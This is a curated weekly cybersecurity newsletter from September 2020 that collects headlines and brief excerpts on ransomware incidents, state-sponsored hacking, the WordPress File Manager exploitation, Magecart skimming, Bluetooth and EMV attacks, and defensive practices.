A Review of the Best News of the Week on Cyber Threats & Defense

Virginia’s Largest School System Hit With Ransomware (Dark Reading, Sep 14 2020)
Fairfax County Public Schools has launched an investigation following a ransomware attack on some of its technology systems.

Russian state hackers are targeting Biden and Trump campaigns, MSFT warns (Ars Technica, Sep 11 2020)
Russia’s most notorious hacking group is using new techniques to breach accounts.

Attackers Fight for Control of Sites Targeted in File Manager Vulnerability (Wordfence, Sep 10 2020)
Last week, we covered a vulnerability in the File Manager plugin installed on over 700,000 WordPress sites. By Friday, September 4, 2020, we recorded attacks on over 1.7 million sites, and by today, September 10, 2020 the total number of sites attacked has increased to over 2.6 million. We’ve seen evidence of multiple threat actors …


Filter Out the Noise
Since I started this curated newsletter in June 2017, I’ve clipped ~16,000 articles and narrowed them down into the best 20 per day & best 15 per week. This is my favorite way to cut through all the security marketing and hype. If you’re enjoying it, tell a friend. If you hate it, tell an enemy.
Thanks! – Lucas Samaras

Share today’s post on Twitter Facebook LinkedIn


US Court Documents Published in Ransomware Attack (Infosecurity Magazine, Sep 11 2020)
Cyber-attackers hit Louisiana court with ransomware, publish stolen documents online

12 checklist items for defeating Magecart attacks (SC Media, Sep 11 2020)
Magecart groups have made many successful attacks on high-profile companies over the past two years. In a Magecart attack, attackers covertly inject credit card skimming code into the checkout pages of e-commerce websites to exfiltrate data on thousands of customers. While some might only remember Magecart from the 2018 British Airways breach, one of these…

Interesting Attack on the EMV Smartcard Payment Standard (Schneier on Security, Sep 14 2020)
“It’s complicated, but it’s basically a man-in-the-middle attack that involves two smartphones. The first phone reads the actual smartcard, and then forwards the required information to a second phone. That second phone actually conducts the transaction on the POS terminal. That second phone is able to convince the POS terminal to conduct the transaction without requiring the normally required PIN.”

Securing Active Directory accounts against password-based attacks (Help Net Security, Sep 08 2020)
Traditional password-based security might be headed for extinction, but that moment is still far off. In the meantime, most of us need something to prevent our worst instincts when it comes to choosing passwords: using personal information, predictable (e.g., sequential) keystroke patterns, password variations, well-known substitutions, single words from a dictionary and – above all – reusing the same password for many different private and enterprise accounts.

Combat data breaches by using training and technology (SC Media, Sep 08 2020)
Corporate data breaches are a big deal, and as data grows more valuable and regulations become stricter, it’s increasingly important to have the right mechanisms in place to prevent them. IBM’s 2020 Cost of a Data Breach report found that the average cost of a breach in the U.S. was more than $8 million.

Evilnum Cyberspies Update Arsenal in Recent Attacks (SecurityWeek, Sep 07 2020)
The threat group tracked as Evilnum was observed using updated tactics and tools in recent attacks, Cybereason’s Nocturnus research team reported last week.

Ripple20 Malware Highlights Industrial Security Challenges (Dark Reading, Sep 10 2020)
Poor security practices allowed software vulnerabilities to propagate throughout industrial and IoT products for more than 20 years.

Why We Need to Pay Attention to Attacks on the Smart-Built Environment (Dark Reading, Sep 09 2020)
Are attacks on IoT physical security devices real or just theoretical? Why professionals need to be aware of the real-life examples in an effort to guard against future attacks on their own businesses.

Researchers Discover Rare Form of Malware that Targets VoIP Softswitches (Infosecurity Magazine, Sep 10 2020)
A new type of Linux malware is designed to target a specific VoIP platform

BLURtooth Vulnerability Can Allow Bluetooth MITM Attacks (SecurityWeek, Sep 10 2020)
A security vulnerability in the Cross-Transport Key Derivation (CTKD) of devices supporting both Bluetooth BR/EDR and LE could allow an attacker to overwrite encryption keys, researchers have discovered.

Spear-Phishers Leverage Office 365 Ecosystem to Validate Stolen Creds in Real Time (Dark Reading, Sep 11 2020)
New attack technique uses Office 365 APIs to cross-check credentials against Azure Active Directory as victim types them in.

Cyber-Risks Explode With Move to Telehealth Services (Dark Reading, Sep 10 2020)
The hasty shift to online delivery of primary care services since the COVID-19 outbreak has attracted significant attacker interest.

Four ways network traffic analysis benefits security teams (Help Net Security, Sep 11 2020)
The march towards digital transformation and the increasing volume of cyberattacks are finally driving IT security and network teams towards better collaboration. This idea isn’t new, but it’s finally being put into practice at many major enterprises. Network traffic analysis and security The reasons are fairly straightforward: all those new transformation initiatives – moving workloads to the cloud, pursuing virtualization or SD-WAN projects, etc. – create network traffic blind spots that can’t…

Zero Trust Adoption Increases During Lockdown (Infosecurity Magazine, Sep 11 2020)
Recent polls by Deloitte find zero trust adoption has increased in 2020